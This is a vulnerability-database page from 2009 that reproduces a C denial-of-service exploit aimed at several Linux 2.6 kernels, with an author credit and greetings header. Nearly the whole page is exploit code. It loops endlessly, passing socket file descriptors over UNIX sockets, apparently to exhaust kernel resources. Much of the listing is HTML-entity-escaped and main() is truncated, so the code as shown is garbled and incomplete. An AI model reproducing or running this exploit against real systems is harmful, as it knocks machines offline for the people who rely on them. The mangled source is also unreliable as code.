Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21101
HistoryJan 04, 2009 - 12:00 a.m.

Linux Kernel 2.6.18/2.6.24/2.6.20/2.6.22/2.6.21 denial of service exploit

2009-01-0400:00:00
vulners.com
10
JSON

/*
Linux Kernel 2.6.18/2.6.24/2.6.20/2.6.22/2.6.21 denial of service exploit

Author : Adurit Team
>> djekmani4ever

Home : www.hightsec.com

greetz : adurit team - v4-team - Zigma - stack - Mr.safa7 - king sabri - alphanix - and all my friends

note : this code for education :)
*/

#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>
#include <assert.h>
#include <err.h>
#include <stdlib.h>

static int own_child(int *us)
{
int pid;
int s[2];
struct msghdr mh;
char crap[1024];
struct iovec iov;
struct cmsghdr *c;
int *fd;
int rc;

    pid = fork&#40;&#41;;
    if &#40;pid == -1&#41;
            err&#40;1, &quot;fork&#40;&#41;&quot;&#41;;

    if &#40;pid&#41; {
          close&#40;us[1]&#41;;

            return pid;
    }

    close&#40;us[0]&#41;;

    memset&#40;&amp;mh, 0, sizeof&#40;mh&#41;&#41;;
    iov.iov_base = &quot;a&quot;;
    iov.iov_len  = 1;

    mh.msg_iov        = &amp;iov;
    mh.msg_iovlen     = 1;
    mh.msg_control    = crap;
    mh.msg_controllen = sizeof&#40;crap&#41;;

    c = CMSG_FIRSTHDR&#40;&amp;mh&#41;;
    assert&#40;c&#41;;

    c-&gt;cmsg_level = SOL_SOCKET;
    c-&gt;cmsg_type  = SCM_RIGHTS;

    fd = &#40;int*&#41; CMSG_DATA&#40;c&#41;;
    assert&#40;fd&#41;;

    c-&gt;cmsg_len = CMSG_LEN&#40;sizeof&#40;int&#41;&#41;;
    mh.msg_controllen = c-&gt;cmsg_len;

    while &#40;1&#41; {
            if &#40;socketpair&#40;PF_UNIX, SOCK_STREAM, 0, s&#41; == -1&#41;
                    err&#40;1, &quot;socketpair&#40;&#41;&quot;&#41;;

            *fd = s[0];

            rc = sendmsg&#40;us[1], &amp;mh, 0&#41;;
            if &#40;rc == -1&#41;
                    err&#40;1, &quot;sendmsg&#40;&#41;&quot;&#41;;

            if &#40;rc != iov.iov_len&#41;
                    errx&#40;1, &quot;sent short&quot;&#41;;

            close&#40;s[0]&#41;;
            close&#40;us[1]&#41;;
            us[1] = s[1];
    }

}

static void own(void)
{
static int pid;
static int us[2];
char crap[1024];
char morte[1024];
struct cmsghdr *c;
int rc;
struct msghdr mh;
struct iovec iov;
int *fds;

    if &#40;!pid&#41; {
            if &#40;socketpair&#40;PF_UNIX, SOCK_STREAM, 0, us&#41; == -1&#41;
                    err&#40;1, &quot;socketpair&#40;&#41;&quot;&#41;;
            pid = own_child&#40;us&#41;;
    }

    iov.iov_base = morte;
    iov.iov_len  = sizeof&#40;morte&#41;;

    memset&#40;&amp;mh, 0, sizeof&#40;mh&#41;&#41;;
    mh.msg_iov        = &amp;iov;
    mh.msg_iovlen     = 1;
    mh.msg_control    = crap;
    mh.msg_controllen = sizeof&#40;crap&#41;;

    rc = recvmsg&#40;us[0], &amp;mh, 0&#41;;
    if &#40;rc == -1&#41;
            err&#40;1, &quot;recvmsg&#40;&#41;&quot;&#41;;

    if &#40;rc == 0&#41;
            errx&#40;1, &quot;EOF&quot;&#41;;

    c = CMSG_FIRSTHDR&#40;&amp;mh&#41;;
    assert&#40;c&#41;;
    assert&#40;c-&gt;cmsg_type == SCM_RIGHTS&#41;;

    fds = &#40;int*&#41; CMSG_DATA&#40;c&#41;;
    assert&#40;fds&#41;;

    close&#40;us[0]&#41;;
    us[0] = *fds;

}

int main(int argc, char *argv[])
{
own();
exit(0);

JSON